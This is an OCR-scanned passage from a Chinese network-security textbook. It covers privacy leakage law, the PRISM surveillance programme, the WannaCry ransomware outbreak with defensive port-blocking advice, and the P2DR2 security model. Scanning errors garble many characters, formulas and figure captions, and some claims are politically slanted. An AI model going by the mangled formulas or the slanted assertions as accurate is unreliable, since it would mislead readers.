内 部 ,企业 在 处 理 数据 的 过 程 中 造成 隐私 泄露 问题 有 4 个 相关 的 数据 维 : 信息 的 收集 、 误 
用 、 二 次 使 用 以 及 未 授权 访问 。 此 外 ,业内 人 士 可 以 对 外 发 布 数据 ,无 授权 地 访问 或 窃取 ,把 
个 人 数据 卖 给 第 三 方 、 金 融 机 构 或 政府 机 构 或 者 同 他 们 共享 数据 等 ; 外 患 主要 是 指 外 部 人 
为 了 获取 数据 ,通过 系统 的 漏洞 对 数据 的 窃取 。 同 时 ,研究 者 们 也 发 现 通过 财务 奖励 补偿 用 
户 , 可 以 鼓励 他 们 进行 信息 发 布 ,同样 ,如 果 用 户 想 要 获得 个 性 化 服务 ,他 们 可 能 会 提供 更 多 


第 1 章 网 络 安全 概论 bs 





的 个 人 信息 。 因 此 ,个 人 隐私 的 泄露 不 仅 有 企业 的 责任 而 且 也 有 个 人 的 因素 ,而 个 人 隐私 的 
泄露 可 能 影响 到 个 人 的 情感 .身体 以 及 财物 等 多 个 方面 。 

个 人 隐私 数据 除了 用 于 精准 的 广告 投放 ,还 会 被 不 法 分 子 用 于 勒索 用 户 钱财 ,给 互联 网 
用 户 带 来 更 严重 .更 直接 的 经 济 损失 。 

《最 高 人 民法 院 、 最 高 人 民 检 察 院 关于 办 理 侵 犯 公 民 个 人 信息 刑事 案件 适用 法 律 若干 问 
题 的 解释 ) 已 于 2017 年 6 月 1 日 起 施行 。 司 法 解释 明确 : 向 特定 人 提供 公民 个 人 信息 ,以 
及 通过 信息 网 络 或 者 其 他 途径 发 布 公 民 个 人 信息 的 ,应 当 认 定 为 (刑法 ) 规 定 的 “提供 公民 个 
人 信息 ”。 

对 于 《刑法 ) 相 关 规 定 中 “情节 严重 ”的 认定 标准 ,此 次 司法 解释 明确 规定 了 十 种 情形 , 包 
括 非法 获取 、 出 售 或 者 提供 行踪 轨迹 信息 、 通 信 内 容 、 征 信 信 息 、 财 产 信息 五 十 条 以 上 的 ; 非 
法 获取 ,出售 或 者 提供 住宿 信息 .通信 记录 、 健 康生 理 信息 、 交 易 信 息 等 其 他 可 能 影响 人 身 、 
财产 安全 的 公民 个 人 信息 五 百 条 以 上 的 ; 非法 获取 、 出 售 或 者 提供 前 两 项 规定 以 外 的 公民 
个 人 信息 五 千 条 以 上 的 ; 违法 所 得 五 千 元 以 上 等 。 

2. 棱镜 计划 

全 球 互联 网 的 最 终 主 导 权 一 直 牢 牢 掌握 在 美国 的 手中 ,棱镜 计划 (PRISM) 表 明 互 联网 
对 美国 几乎 是 透明 的 ,美国 的 情报 机 构 能 够 通过 秘密 技术 监控 世界 各 国 ,监控 几乎 每 一 个 
人 ,控制 关键 基础 设施 .“ 微 软 黑屏 ?事件 向 世人 揭露 出 一 个 重大 事实 : 微软 有 能 力 控制 使 
用 Windows 系统 的 每 一 台 计 算 机 ,用 户 实际 上 已 经 丧失 了 对 自己 计算 机 的 控制 权 。 

棱镜 计划 是 由 美国 国家 安全 局 (NSA) 自 2007 年 小 布什 时 期 起 开始 实施 的 绝密 电子 监 
听 计 划 , 人 允许 相关 工作 人 员 直 接 进 入 美国 网 际 网 络 公司 的 中 心服 务 器 里 挖掘 数据 .收集 情 
报 ,监控 的 内 容 包括 电子 邮件 .即时 消息 、 视 频 . 照 片 . 存 储 数 据 . 语 音 聊天 、 文 件 传输 、 视 频 会 
议 .登录 时 间 和 社交 网 络 资料 的 细节 。 通 过 该 计划 ,NSA 可 以 实时 监控 一 个 人 正在 进行 的 
网 络 搜索 内 容 。 

棱镜 计划 监听 的 对 象 为 任何 在 美国 以 外 使 用 微软 .谷歌 .雅虎 等 产品 的 客户 和 与 国外 人 
士 通信 的 美国 公民 ,这 其 中 既 有 美国 盟友 德国 总 理 默 克 尔 ,也 有 普通 百姓 ; 既 有 清华 大 学 、 
香港 中 文大 学 这 样 的 网 络 主 节点 ,也 有 普通 计算 机 。 包 括 微软 .雅虎 .谷歌 .苹果 等 在 内 的 
9 家 国际 网 络 巨 头 皆 参与 其 中 。 

棱镜 计划 说 明了 美国 政府 对 美国 境内 乃至 全 球 大 规模 地 监控 公民 隐私 。2012 年 ,作为 
总 统 每 日 简报 的 一 部 分 ,棱镜 计划 收集 的 数据 被 引用 1477 次 ,国安 局 至 少 有 1/7 的 报告 使 
用 相关 数据 。 

棱镜 计划 爆料 人 斯 诺 登 在 向 美国 《华盛顿 邮 报 ?提供 的 机 密 文 件 中 披露 , 自 2009 年 以 
来 ,美国 国家 安全 局 一 直 在 入 侵 中 国内 地 和 中 国 香港 的 计算 机 系统 。 此 外 ,美国 国家 安全 局 
的 “定制 人 口 行动 ”办公室 (TAO) 也 一 直 从 事 着 侵入 中 国境 内 计算 机 和 通信 系统 进行 网 络 
攻击 的 行为 , 借 此 获取 有 关中 国 的 有 价值 情报 。 

3. Wanna Cry 勒索 病毒 

2017 年 5 月 12 日 ,一 次 迄今 为 止 最 大 规模 的 Wanna Cry 勒索 病毒 网 络 攻击 席卷 全 球 。 
据 卡 巴 斯 基 统计 ,十 几 个 小 时 内 全 球 共有 100 多 个 国家 的 至 少 4. 5 万 台 安 装 Windows 系统 
的 计算 机 中 招 。 美国 .中 国 \ 日 本 、 俄 罗斯 、 英 国 等 重要 国家 均 有 受 攻击 现象 发 生 ,其 中 俄 罗 
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斯 受 攻击 最 为 严重 , 约 有 1000 台 计 算 机 受到 影响 ,最 大 的 银行 俄罗斯 联邦 储备 银行 
(Sberbank) 成 为 了 攻击 目标 ; 对 英国 的 攻击 主要 集中 在 英国 国家 医疗 服务 体系 (NHS) , 旗 
下 至 少 有 25 家 医院 计算 机 系统 瘫痪 、 救 护 车 无 法 派遣, 极 有 可 能 延误 病人 治疗 ,造成 性 命 之 
忧 ; 我 国 多 地 部 分 中 国 石油 旗下 2 万 多 个 加 油 站 在 5 月 13 日 0 点 左右 也 突然 出 现 断 网 ,无 
法 使 用 支付 宝 、 微 信 、 银 联 卡 等 联网 支付 方式 ,只 能 使 用 现金 支付 ; 国内 多 所 高 校 受到 了 此 
次 网 络 攻击 的 影响 ,致使 许多 实验 室 数据 和 毕业 设计 被 锁 , 对 学 习 资 料 和 个 人 数据 造成 严重 
损失 。 由 于 正 值 高 校 毕业 季 , 大 量 应 届 毕 业 生 的 毕业 论文 被 加 密 , 直 接 影 响 到 学 生 毕 业 
答辩 。 

网 络 安全 机 构 通报 ,这 是 不 法 分 子 利 用 被 次 的 美国 国家 安全 局 (NSA) 自主 设计 的 
Windows 系统 黑客 工具 Eternal Blue( 永 恒 之 蓝 ) ,再 将 一 款 勒 索 病毒 升级 后 ,形成 如 今 攻击 
全 球 多 个 国家 的 新 型 病毒 。 永 恒 之 蓝 传播 的 勒索 病毒 以 ONION 和 WNCRY 两 个 家 族 为 
主 , 名 为 Wanna Cry( 想 句 ) 或 Wanna Decryptor( 想 解锁 ) 。 受 害 机 器 的 磁盘 文件 会 被 筑 改 
为 相应 的 扩展 名 ,图 像 文档、 视频 .压缩 包 等 各 类 资料 都 无 法 正常 打开 ,只 有 支付 赎金 才能 

如 果 网 络 内 有 一 台 计 算 机 感染 该 病毒 ,网 络 中 其 他 运行 Windows 的 计算 机 如 果 没 有 安 
装 微软 补丁 , 则 只 要 开机 上 网 ,无 须 用 户 进行 任何 操作 就 能 在 计算 机 里 执行 任意 代码 , 植 人 
勒索 病毒 等 恶意 程序 ,从 而 引发 病毒 在 网 络 内 传播 ,造成 大 面积 感染 。 

360 针对 勒索 病毒 事件 的 监测 数据 显示 ,国内 首先 出 现 的 是 ONION 病毒 ,平均 每 小 时 
攻击 约 200 次 ,夜间 高 峰 期 达到 每 小 时 1000 多 次 ; WNCRY 勒索 病毒 则 是 2017 年 5 月 12 日 
下 午 新 出 现 的 全 球 性 攻击 ,并 在 中 国 的 校园 网 迅速 扩散 ,夜间 高 峰 期 每 小 时 攻击 约 4000 次 。 

Wanna Cry 勒索 病毒 属于 蠕虫 病毒 ,自身 具备 网 络 自 动 扩散 功能 ,通过 远程 攻击 网 络 
中 运行 Windows 操作 系统 计算 机 的 445 端口 (文件 共享 ) 实 现 传播 。 该 病毒 自动 生成 IP 地 
址 ,对 联 入 网 络 其 他 计算 机 的 445 端口 进行 自动 扫描 ,只 要 计算 机 正在 运行 , 且 445 端口 未 
防护 并 且 未 安装 补丁 ,就 会 被 勒索 蠕虫 病毒 自动 扫描 发 现 , 之 后 蠕虫 病毒 即 可 利用 445 端口 
的 SMB 协议 漏洞 利用 工具 马上 入 侵 感 染 这 人 台 计 算 机 。 

SMB 协议 是 一 个 网 络 文件 共享 协议 , 它 允 许 应 用 程序 和 终端 用 户 从 远 端 的 文件 服务 器 
访问 文件 资源 ,用 于 在 计算 机 之 间 共 享 文件 打印机、 串口 和 邮箱 等 。 我 们 平时 使 用 的 网 络 
共享 功能 ,就 是 通过 SMB 协议 在 445 网 络 端口 实现 的 。 

此 次 全 球 爆 发 大 规模 蠕虫 式 勒索 软件 病毒 Wanna Cry. 攻 击 的 主要 对 象 是 医院 、 教 育 等 
公共 系统 的 计算 机 ,主要 原因 是 公共 系统 的 计算 机 通常 更 新 不 够 及 时 ,保护 措施 薄弱 ,最 易 
受到 攻击 。 

勒索 病毒 在 我 国 校园 网 传播 速度 之 快 、 影 响 面 之 大 的 主要 原因 是 当前 大 部 分 学 校 基 本 
是 一 个 大 的 内 网 互通 的 局 域 网 .不同 的 业务 未 划分 安全 区 域 ,为 了 方便 教学 、 科 研 , 存 在 大 量 
暴露 着 445 端口 的 机 器 ,所 以 成 为 了 此 次 攻击 的 重 灾 区 。 例 如 ,学 生 管理 系统 、 教 务 系统 等 
都 可 以 通过 任何 一 台 连 入 的 设备 访问 。 同 时 ,实验 室 、 多 媒体 教室 、 机 器 IP 分 配 多 为 公 网 
IP, 如 果 学 校 未 做 相关 的 权限 限制 ,所 有 机 器 直接 暴露 在 外 面 。 

勒索 病毒 引诱 用 户 点 击 看 似 正常 的 邮件 .附件 或 文件 ,从 而 完成 病毒 的 下 载 和 安装 , 称 
为 “钓鱼 式 攻击 ”(phishing) 。 病 毒 发 作 时 会 将 用 户 计算 机 锁 死 ,把 所 有 文件 都 改 成 加 密 格 
式 , 扩 展 名 为 . onion, 并 修改 用 户 桌 面 背 景 ,弹出 提示 窗口 告知 用 户 交 纳 赎金 的 方式 。 
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提示 窗口 内 含 “ 我 的 计算 机 出 了 什么 问题 ?”“* 有 没有 恢复 这 些 文件 的 方法 ?”“ 如 何 支付 
赎金 ?” 等 信息 。 病 毒 要 求 用 户 在 被 感染 后 的 三 天 内 交纳 相当 于 300 美元 的 比特 币 , 三 天 后 赎 
金 将 翻 倍 。 七 天 内 不 缴纳 赎金 的 计算 机 数据 将 被 全 部 删除 且 无 法 修复 。 对 无 力 支付 300 美元 
的 人 还 设 有 为 期 六 个 月 的 特别 还 款 通道 。 用 户 可 以 尝试 修复 极 小 一 部 分 数据 ,作为 证 明 病 毒 
解密 有 效 的 证 据 。 

这 次 事件 给 广大 高 校 师 生 上 了 一 堂 真实 .生动 的 网 络 安全 课 ,直接 反映 了 高 校 在 校园 网 
安全 管理 上 存在 的 安全 漏洞 ,给 我 们 以 下 启示 : 

(1) 对 于 校园 网 络 管理 人 员 ,应 该 及 时 配置 校园 网 网 络 边界 设备 以 及 校园 网 内 部 的 网 
络 设备 ,通过 添加 访问 控制 列表 规则 或 者 网 络 安全 防护 规则 ,阻止 对 任意 目标 IP 地 址 且 目 
标 端 口 为 445 端口 的 网 络 数据 包 的 传播 ,从 而 阻止 病毒 从 外 网 传人 内 网 ,同时 对 病毒 在 校园 
网 内 网 的 传播 起 到 部 分 拦截 作用 。 

(2) 对 广大 用 户 ,要 安装 正版 操作 系统 .Office 软件 并 将 自动 漏洞 .补丁 升级 设置 为 自 
动 安装 ; 关闭 445、135、137、138、139 端口 ,关闭 网 络 共享 ; 强化 网 络 安全 意识 ,意识 到 网 络 
安全 就 在 身边 ,要 时 刻 提防 : 不 明 链 接 不 点 击 , 不 明文 件 不 下 载 ,不 明 邮 件 不 打开 ; 养 成 定 
期 备份 自己 计算 机 中 的 重要 文件 资料 到 移动 硬盘 /U 盘 / 网 盘 的 习惯 ,减少 损失 。 

(3) 校园 网 不 是 世外桃源 ,网 络 安全 存在 于 高 校 日 常 工作 中 ,也 存在 于 高 校 学 生 的 学 
习 、 生 活 中 。 图 1-6 是 学 生 的 一 些 感想 。 


BetterManzh 伪 


全 Hitopig 塘 昨天 23;21 来 自 iphone 6 
昨天 23:02 来 自 Hitopig's iPhone 6 黑客 这 种 事情 第 一 次 在 身边 ， 学 校 那 么 多 


一 直觉 得 黑客 的 东西 远 在 天 边 谁 知道 今天 同学 的 电脑 都 中 病毒 了 留 这 次 这 么 严 
学 校 就 被 黑 了 还 好 我 铁 过 一 动 重 ， 说 是 全 国 性 的 。 大 家 都 注意 点 吧 人 


图 1-6 学 生 感 想 


1.2.3 网 络 安全 威胁 


网 络 是 一 个 多 种 类 型 计算 机 设备 、 多 种 协议 ,多 系统 、 多 应 用 、 多 用 户 组 成 的 分 布 范围 很 
广 的 系统 ,其 复杂 性 高 ,因此 不 可 避免 地 存在 着 各 种 各 样 的 安全 隐患 和 漏洞 。 据 Security 
Focus 公司 的 漏洞 统计 数据 显示 , 绝 大 部 分 操作 系统 存在 着 安全 漏洞 。 由 于 管理 ,软件 工 程 
难度 等 问题 ,新 的 隐患 和 漏洞 不 断 地 被 引入 到 网 络 环境 中 ,所 有 这 些 安全 脆弱 点 都 可 能 成 为 
攻击 者 攻击 的 切入 点 ,攻击 者 可 以 利用 这 些 脆 弱点 和 人 侵 系 统 , 窃 取信 息 。 

网 络 所 面临 的 威胁 可 分 为 两 种 : 一 是 对 网 络 中 信息 的 威胁 ; 二 是 对 网 络 中 设备 的 威 
胁 。 影 响 计算 机 网 络 的 因素 很 多 ,有 些 因 素 可 能 是 有 意 的 ,也 可 能 是 无 意 的 ; 可 能 是 人 为 
的 ,也 可 能 是 非 人 为 的 ; 从 威胁 的 主体 来 看 ,可 能 是 外 来 黑客 对 网 络 系统 资源 的 非法 使 用 ， 
也 可 能 是 内 部 人 员 的 破坏 和 信息 的 偷窃 ,还 可 能 是 商业 竞争 对 手 商业 竞争 的 需要 。 

归结 起 来 ,针对 网 络 安全 的 威胁 主要 有 : 

(1) 人 为 的 无 意 失误 一 一 如 网 络 安 全 管理 不 规范 造成 的 安全 级 别 低 , 操 作 员 安 全 配置 
不 当 造成 的 安全 漏洞 ,用 户 安全 意识 不 强 , 用 户口 令 选择 不 慎 , 用 户 将 自己 的 账号 随意 转借 
他 人 或 与 别人 共享 等 都 会 对 网 络 安全 带 来 威胁 。 

(2) 人 为 的 恶意 攻击 一 一 这 是 网 络 所 面临 的 最 大 威胁 ,敌手 的 攻击 和 计算 机 犯罪 就 属 


18 网 络 安 全 教程 与 实践 (第 2 版 ) 





于 这 一 类 。 网 络 攻 击 手段 越 来 越 隐 项 ,攻击 技术 越 来 越 先进 、 攻 击 范围 越 来 越 广 、 攻 击 工具 
随处 可 得 、 攻 击 实施 简单 易 行 ,这 些 都 为 防范 网 络 攻击 带 来 了 巨大 的 挑战 。 

人 为 的 恶意 攻击 分 为 两 种 : 一 种 是 主动 攻击 , 它 以 各 种 方式 有 选择 地 破坏 信息 的 有 效 
性 和 完整 性 ; 另 一 类 是 被 动 攻击 , 它 是 在 不 影响 网 络 正 常 工 作 的 情况 下 ,进行 截获 窃取 、 破 
译 以 获得 重要 机 密 信息 。 这 两 种 攻击 均 可 对 计算 机 网 络 造 成 极 大 的 危害 ,并 导致 机 密 数 据 
的 泄露 。 攻 击 的 方式 可 以 是 病毒 .代码 炸 弹 或 者 是 特洛伊 木马 等 。 

(3) 网 络 软 件 的 漏洞 和 “后 门 ” 一 一 网 络 软件 不 可 能 是 百分之百 无 缺陷 和 无 漏洞 的 , 然 
而 ,这 些 漏洞 和 缺陷 恰恰 是 黑客 进行 攻击 的 首选 目标 ,黑客 攻 入 网 络 内 部 的 事件 大 部 分 就 是 
因为 安全 措施 不 完善 所 导致 的 苦果 。 另 外 ,软件 的 “后 门 ”是 软件 公司 的 设计 编程 人 员 为 了 
自己 的 方便 而 设置 的 ,一 般 不 为 外 人 所 知 ,但 一 旦 “后 门 ? 打 开 , 后 果 不 堪 设想 。 

(4) 网 络 传输 线 缆 连 接 威胁 ,包括 搭 接 、 窃 听 、 拨 号 进入 帮 至 破坏 线 缆 导致 连接 中 断 。 
在 局 域 网 中 ,由 于 信息 插座 均 安 装 在 建筑 物 内 的 墙壁 上 ,如 果 没 有 安全 限制 或 监控 ,攻击 者 
很 可 能 就 会 从 信息 插座 联 入 网 络 ,从 而 成 为 局 域 网 内 用 户 , 非 常 容易 地 窃取 网 络 中 的 各 种 
信息 。 

除了 上 述 威胁 以 外 ,还 包括 身份 鉴别 威胁 和 各 种 物理 威胁 。 身 份 鉴别 威胁 表现 在 攻击 
者 会 冒充 合法 的 用 户 , 通 过 各 种 方式 获得 合法 用 户 的 口令 ,来 进入 网 络 系 统 , 实 施 攻 击 ; 各 
种 物理 威胁 则 来 自 于 偷窃 (包括 偷 穷 设备 、 偷 穿 信息 或 者 偷窃 服务 等 ) 废物 搜寻 (从 一 些 废 
弃 的 打印 材料 或 磁盘 中 搜寻 有 用 的 信息 ) 和 间谍 行 为 。 

此 外 ,我 国 的 信息 化 核心 技术 特别 是 信息 安全 核心 技术 在 国际 上 尚 比较 落后 ,一 些 关键 
技术 受制 于 别人 ,也 是 造成 网 络 安全 性 问题 的 重要 原因 之 一 。 

随 着 网 络 应 用 从 和 科研、 工作、 学 习 、 生 活 娱乐 逐步 向 社会 经 济 各 领域 渗透 ,网 民 对 网 络 信 
任 和 安全 的 要 求 也 日 渐 提 高 ,网 络 安全 问题 日 益 受到 人 们 的 重视 。 

总 体 来 看 ,网 络 安全 之 所 以 如 此 重要 ,表现 在 以 下 几 个 方面 : 

(1) 计算 机 存储 和 处 理 的 是 有 关 国 家 安全 的 政治 经济 、 军 事 、 国 防 的 情况 及 一 些 部 门 、 
机 构 、 组 织 的 机 密 信息 或 是 个 人 的 敏感 信息 、 隐 私 , 因 此 成 为 敌对 势力 、 不 法 分 子 的 攻击 
目标 。 

(2) 随 着 计算 机 系统 功能 的 日 益 完 善 和 速度 的 不 断 提高 ,系统 组 成 越 来 越 复 杂 , 系 统 规 
模 越 来 越 大 ,特别 是 Internet 的 迅速 发 展 , 存 取 控制 .逻辑 连接 数量 不 断 增 加 ,软件 规模 空前 
膨胀 ,任何 隐 含 的 缺陷 .失误 都 能 造成 巨大 损失 。 

(3) 人 们 对 计算 机 系统 的 需求 在 不 断 扩 大 ,这 类 需求 在 许多 方面 都 是 不 可 逆转 ,不 可 替 
代 的 ,而 计算 机 系统 使 用 的 场所 正在 转向 工业 、 农 业 、 时 外 、 天 空 海上、 宇宙 空间 、 核 辐射 环 
境 等 ,这 些 环境 都 比 机房 恶 劣 ,出 错 率 和 故障 的 增多 必 将 导致 可 靠 性 和 安全 性 的 降低 。 

(4) 随 着 计算 机 系统 的 广泛 应 用 ,各 类 应 用 人 员 队 伍 迅速 发 展 壮 大 ,教育 和 培训 却 往往 
跟 不 上 知识 更 新 的 需要 ,操作 人 员 、 编 程 人 员 和 系统 分 析 人 员 的 失误 或 缺乏 经 验 都 会 造成 系 
统 的 安全 功能 不 足 。 

(5) 计算 机 网 络 安全 问题 涉及 许多 学 科 领 域 , 既 包括 自然 科学 ,又 包括 社会 科学 。 就 计 
算 机 系统 的 应 用 而 言 ,安全 技术 涉及 计算 机 技术 .通信 技术 、 存 取 控 制 技术 、 校 验 认 证 技术 、 
容错 技术 、 加 密 技 术 、 防 病毒 技术 、 抗 干扰 技术 、 防 泄露 技术 等 ,因此 是 一 个 非常 复杂 的 综合 
问题 ,并 且 其 技术 、 方 法 和 措施 都 要 随 着 系统 应 用 环境 的 变化 而 不 断 变 化 。 
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(6) 从 认识 论 的 高 度 看 ,人 们 往往 首先 关注 系统 功能 ,然后 才 被 动 地 注意 系统 应 用 的 安 
全 问题 。 因 此 广泛 存在 着 重 应 用 、 轻 安全 、 法 律 意识 淡薄 的 现象 。 






检测 
(Detection) 






1.3 网 络 安全 评价 
1.3.1 P2DR2 动态 安全 模型 

如 图 1-7 所 示 , P2DR2 动态 安全 模型 由 策略 (Policy)、 防 护 (Protection)、 检 测 
(Detection) 、 响 应 (Response) 和 恢复 (Restore) 五 要 素 构成 ， 
是 一 种 基于 闭环 控制 .主动 防御 、 依 时 间 及 策略 特征 的 动态 
安全 模型 ,能 够 构造 多 层次 、 全 方位 和 立体 的 区 域 网 络 安 全 
环境 。 策略 (Policy) 

(1) 策略 是 PZDR2 模型 的 核心 ,规定 网 络 要 达到 安全 的 
目标 而 采取 的 各 种 方法 和 措施 ,所 有 的 防护 、 检 测 、 响 应 、 恢 
复 都 是 依据 安全 策略 实施 的 。 策 略 描述 网 络 中 哪些 资源 要 
得 到 保护 ,以 及 如 何 实现 对 它们 的 保护 等 。 策 略 一 般 包 括 总 于 7 了 9 取 术 本 
体 安 全 策略 和 具体 安全 策略 两 个 部 分 。 

(2) 防护 指 通过 修复 系统 漏洞 .正确 设计 开发 和 安装 系统 来 预防 安全 事件 的 发 生 ; 通 
过 定期 检查 来 发 现 可 能 存在 的 系统 脆弱 性 ; 通过 教育 手段 使 用 户 和 操作 员 正 确 使 用 系统 ， 
防止 意外 威胁 ; 通过 访问 控制 ,监视 等 手段 来 防止 恶意 威胁 。 如 用 于 提供 边界 保护 和 构建 
安全 域 的 防火 墙 技术 ,操作 系统 的 身份 认证 技术 .信息 传 输 过 程 中 的 加 密 技术 等 。 

(3) 检测 是 动态 响应 和 加 强 防护 的 依据 ,通过 不 断 地 检测 和 监控 网 络 ,来 发 现 新 的 威胁 
和 弱点 ,通过 循环 反馈 来 及 时 做 出 有 效 的 响应 。 主 要 包括 漏洞 扫描 技术 、IDS、IPS 等 。 当 攻 
击 者 穿 透 防 护 时 ,检测 功能 就 发 挥 作用 ,与 防护 形成 互补 。 

(4) 网 络 一 旦 检测 到 入 侵 ,响应 就 开始 工作 ,进行 人 侵 事件 处 理 , 阻 止 人 侵 进一步 发 展 。 
如 提示 用 户 有 程序 要 修改 操作 系统 注册 表 ,要 求 用 户 确 认 是 否 允 许 修 改 。 

响应 机 制 要 对 入 侵 行为 做 出 反应 ,记录 入 侵 行为 并 通知 系统 管理 员 ,采取 相应 的 措施 阻 
止 该 入侵 行为 。 响 应 技术 主要 包括 报警 .反击 等 。 

(5) 恢复 是 指 将 系统 还 原 到 可 用 状态 或 原始 状态 ,包括 系统 恢复 和 信息 恢复 。 

如 图 1-7 所 示 ,模型 在 整体 的 安全 策略 的 控制 和 指导 下 ,在 综合 运用 防护 工具 (如 防火 
墙 操 作 系 统 身 份 认证 ,加密 等 ) 的 同时 ,利用 检测 工具 (如 漏洞 评估 、 入 侵 检测 等 ) 了 解 和 
评估 系统 的 安全 状态 ,通过 适当 的 响应 、 恢 复 将 系统 调整 到 最 安全 或 风险 最 低 的 状态 。 
防护 检测、 响应 ,恢复 组 成 了 一 个 完整 的 ,动态 的 安全 循环 ,在 安全 策略 的 指导 下 保证 网 
络 安全 。 

模型 通过 区 域 网 络 的 路 由 及 安全 策略 分 析 与 制定 ,在 网 络 内 部 及 边界 建立 实时 检测 、 监 
测 和 审计 机 制 , 采 取 实时 ,快速 动态 响应 安全 手段 ,应 用 多 样 性 系统 灾难 备份 恢复 、 关 键 系统 
元 余 设计 等 方法 ,构造 多 层次 ,全 方位 和 立体 的 区 域 网 络 安全 环境 。 

1. P2DR2 模型 的 时 间 域 分 析 
模型 最 基本 的 原理 就 是 认为 ,网 络 安全 相关 的 所 有 活动 ,不 管 是 攻击 行为 .防护 行 
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为 .检测 行为 .响应 行为 等 都 要 消耗 时 间 。 因 此 可 以 用 时 间 来 衡量 一 个 网 络 的 安全 性 和 
安全 能 力 。 

作为 一 个 防护 体系 ,攻击 者 攻击 的 每 一 步 都 需要 花费 时 间 。 定 义 攻击 者 从 攻击 开始 到 
攻击 成 功 花费 的 时 间 就 是 模型 提供 的 防护 时 间 P,; 在 入 侵 发 生 的 同时 ,检测 也 在 发 挥 作 
用 ,检测 到 入 侵 行为 花费 的 时 间 就 是 检测 时 间 D,; 检测 到 入 侵 后 ,网 络 做 出 应 有 的 响应 
动作 ,将 网 络 调整 到 正常 状态 的 时 间 就 是 响应 时 间 和 恢复 时 间 之 和 R,, 则 可 得 到 如 下 安 
全 要 求 : 

公式 1: P, 汪 D, 十 R， 

由 此 针对 于 需要 保护 的 安全 目标 ,要 求 满足 公式 1, 即 防护 时 间 大 于 检测 时 间 加 上 响应 
时 间 , 也 就 是 在 攻击 者 危害 安全 目标 之 前 ,这 种 入 侵 行 为 就 能 够 被 检测 到 并 及 时 处 理 。 

如 果 定 义 E, 二 DD, 十 R,, 则 E, 越 小 系统 就 越 安全 。 

通过 上 面 的 分 析 , 给 出 了 一 个 全 新 的 安全 定义 : 

及 时 的 检测 和 响应 就 是 安全 ,及 时 的 检测 和 恢复 就 是 安全 。 

定义 为 解决 网 络 安全 问题 给 出 了 明确 的 提示 : 提高 系统 防护 时 间 P, .降低 检测 时 间 D， 
和 响应 时 间 R,, 是 加 强 网 络 安全 的 有 效 途 径 。 

P2DR2 动态 安全 模型 认可 风险 的 存在 ,认为 绝对 安全 与 绝对 可 靠 的 网 络 系统 是 不 现实 
的 ,理想 效果 是 期 待 网 络 攻 击 者 穿越 如 表 1-4 所 示 防 御 层 的 机 会 逐 层 递减 ,穿越 第 5 层 的 概 
率 趋 于 零 


表 1-4 P2DR2 动态 模型 




















层 次 主要 功能 

第 5 层 系统 恢复 .系统 备份 和 还 原 
第 4 层 系统 响应 、 对 搞 

第 3 层 系统 检测 .漏洞 扫描 

第 2 层 系统 保护 、 包 过 滤 和 认证 
第 1 层 系统 策略 


2. P2DR2 模型 的 策略 域 分 析 

安全 策略 是 网 络 安全 的 核心 。 网 络 安全 必须 依赖 统一 的 安全 策略 管理 \ 动 态 维护 和 管 
理 各 类 安全 服务 。 安 全 策略 根据 各 类 实体 的 安全 需求 ,划分 信任 域 (安全 域 ) ,制定 各 类 安全 
服务 的 策略 。 

在 同一 信任 域内 的 实体 元 素 ,存在 两 种 安全 策略 属性 , 即 信任 域内 的 实体 元 素 所 共同 具 
有 的 共同 安全 策略 S, 以 及 各 个 实体 自身 具有 的 、 不 违反 S, 的 具体 安全 策略 S,;。 一 个 信任 


域 的 总 体 安全 策略 $=S, 十 > su。 


S, 是 整个 信任 域 的 设备 都 必须 遵守 的 最 低 安全 策略 ,Su 是 各 个 设备 制定 的 更 高 安全 程 
度 的 安全 策略 ,Sui 不 能 违背 S., 只 能 在 S, 基础 上 进一步 强化 安全 措施 。 

安全 策略 不 仅 制定 了 实体 元 素 的 安全 等 级 ,而 且 规定 了 各 类 安全 服务 互动 的 机 制 。 每 
个 信任 域 或 实体 元 素 根据 安全 策略 分 别 实现 身份 验证 ,访问 控制 ,安全 通信 安全 分 析 安 全 
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恢复 和 响应 的 机 制 选择 。 

例如 ,根据 "是 否 允 许 Internet 中 的 计算 机 访问 该 区 域 计算 机 ”这 条 安全 策略 ,可 将 如 
图 1-5 所 示 网 络 划 分 为 安全 区 .DMZ 两 个 安全 程度 不 同 的 区 域 。 安 全 区 (内 网 ) 中 计算 机 之 
间 彼 此 信赖 ,可 相互 访问 ,但 不 允许 Internet 中 的 计算 机 访问 该 区 域 计算 机 ,安全 程度 最 高 ; 
DMZ 中 计算 机 之 间 彼 此 信赖 ,可 相互 访问 ,同时 也 允许 Internet 中 的 计算 机 访问 该 区 域 计 
算 机 ,安全 程度 次 之 。 

通过 在 防火 墙 设置 相应 过 滤 规 则 (一 种 具体 策略 ) 可 实现 Internet( 不 安全 区 ) 的 实体 不 
能 访问 安全 区 的 实体 (计算 机 ), 所 以 安全 区 中 所 有 计算 机 都 应 遵循 共同 安全 策略 S, 二 {不 
允许 Internet 的 计算 机 访问 本 区 域 的 计算 机 } ,其 目的 是 保护 内 网 信息 不 泄露 ,网 络 能 够 正 
常 运行 。 

在 安全 区 中 ,各 个 计算 机 运行 不 同 的 应 用 软件 提供 不 同 的 应 用 服务 ,如 PC, 运行 财务 
软件 提供 工资 管理 服务 ,PC, 运行 Word 提供 文件 共享 打印 服务 。 显 然 PC, 应 具有 向 PC， 
读 写 数据 的 权限 ,但 PC 不 应 具有 向 PC 写 入 数据 的 权限 ,以 防止 其 修改 对 应 工资 数据 。 
所 以 PC, 只 需要 遵循 共同 安全 策略 S, 即 可 ,而 PC, 还 需要 进一步 遵循 自身 的 具体 安全 策 
略 Sp 二 {不 允许 本 区 域 其 他 主机 向 PC, 写 入 数据 }。 因 此 本 信任 域 的 总 体 安全 策略 S 一 
{{ 不 允许 Internet 的 计算 机 访问 本 区 域 的 计算 机 ) ,…… ， (不 允许 本 区 域 其 他 主机 向 PC, 写 
和 数据) 。 

P2DR2 模型 对 网 络 安全 理论 研究 和 实际 工作 都 具有 重要 指导 意义 。 例 如 ,为 了 保护 个 
人 计算 机 PC 的 信息 安全 ,我 们 需要 同时 安装 杀毒 软件 和 防火 墙 ,两 者 缺 一 不 可 。 这 是 因为 
杀毒 软件 的 主要 功能 是 检测 计算 机 是 否 已 感染 病毒 ,并 在 病毒 发 作 后 尽量 恢复 被 破坏 的 信 
息 , 属 于 事后 处 理 。 但 杀毒 软件 不 能 预防 病毒 传播 ,不 具有 检测 木马 ` 网 络 人 侵 的 能 力 ;防火 
墙 的 主要 功能 是 检测 已 知 网 络 人 侵 , 按 照 预 先 设 定 的 检测 规则 实时 阻止 已 知 网 络 入 侵 , 起 响 
